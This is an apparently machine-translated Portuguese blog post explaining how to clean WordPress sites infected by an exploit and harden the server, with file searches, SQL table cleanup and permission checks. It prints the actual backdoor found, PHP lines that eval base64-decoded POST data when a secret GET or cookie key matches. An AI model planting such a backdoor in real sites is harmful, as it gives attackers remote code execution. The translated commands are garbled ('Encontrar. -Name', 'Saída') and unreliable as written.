WordPress Exploit - limpeza de arquivos infectados e segurança do SQL Server.

Antes de ler este post, você deve ver , Para entender algo. :)

Encontramos em vários dos blogs em arquivos stealthsettings.com, semelhante ao código abaixo virusarii surgem da WordPress explorar.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); Saída; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Saída; }?>

xmlrpcSe for acima de arquivo xmlrpc.php da sonolentoMas a um grep servidor, você pode ver que há muito poucos de seu tipo no código fonte.

pppffiuuu

Limpeza de arquivos infectados:

Ooookkkk ...
1. A melhor solução, depois de ter tido backupE limpa o banco de dados é limpar arquivos WordPress (você pode manter wp-config.php e arquivos que não são estritamente na plataforma wp depois que eles são cuidadosamente verificados) no servidor e fazer o upload para a versão original 2.5.1 (Durante este fazer uma versão de atualização WP :)) http://wordpress.org/download/ . Limpe incluindo arquivos de tema, se você não confia em que a verificação de seu cuidado.

Parece ter sido afetados e os arquivos dos temas que não tenham sido usados ​​antes no blog e simplesmente alterar o tema, não resolve o problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Saída; }?> <? php get_header (); ?>

2. Pesquisar e apagar todos os arquivos contendo: * _new.php, * _old.php, * Jpgg *, Giff, * Pngg e arquivo wp-info.txt, se houver....

Encontrar. -Name "* _new.php"
Encontrar. -Name "* _old.php"
Encontrar. -Name "*. Jpgg"
Encontrar. -Name "* _giff"
Encontrar. -Name "* _pngg"
Encontrar. -Nome "wp-info.txt"

3. em / Tmp , Pesquisar e excluir pastas como tmpYwbzT2

Lavagem SQL :

1. na Tabela Tabela wp_options Veja se há excluir as linhas: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Também em wp_options, ir para active_plugins e excluir, se existe um plugin que termina em uma das extensões * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ou se outra extensão é suspeito, verifique cuidadosamente.

3. Na Tabela wp_users, Veja se há um usuário que ainda não escreveu nada no seu direito, a coluna user_nicename. Excluir este usuário, mas anote o número na coluna ID. Este usuário pode usar "WordPress" como user_login e parece ser criado em 00: 00: 00 0000-00-00.

4. Vá para a Tabela wp_usermeta e excluir todas as linhas pertencentes ID acima.

Depois de ter feito esta limpeza sql, desabilitar e habilitar algum plugin. (No blog - painel de instrumentos> -> Plugins)

Servidor seguro:

1. Veja o que diretórios e arquivos são "gravável"(Chmod 777) e tentar colocar-lhes um chmod que não permitiria que a sua escrita, em qualquer nível. (644 chmod, por exemplo)

Encontrar. -Perm-2-ls

2. Veja o que os arquivos têm o conjunto de bits suid ou sgid . Se você não usar esses arquivos colocar sobre eles chmod 0 ou desinstalar o pacote que contém. São muito perigosas, porque eles privilégios de execução "grupo"Ou"raiz"E não com privilégios de usuário normal para executar esse arquivo.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Verifique quais portas estão abertas e tentar fechar ou proteger aqueles que não são utilizados.

netstat-an | grep-i ouvir

Sobre isso. Eu vejo Google Search e outros dizem: "Bem que você fez!". Bem bom que você fez ... mas e se o Google começa a banir todos os sites formando É SPAM e colocar Trojans (Trojan.Clicker.HTML) em cookies?

WordPress Exploit - limpeza de arquivos infectados e segurança do SQL Server.

Sobre o autor

discrição

Apaixonado por tudo o que significa gadget e TI, tenho o prazer de escrever no stealthsettings.com da 2006 e adoro descobrir coisas novas sobre computadores e macOS, sistemas operacionais Linux, Windows, iOS e Android.

Adicionar comentário

Deixe um comentário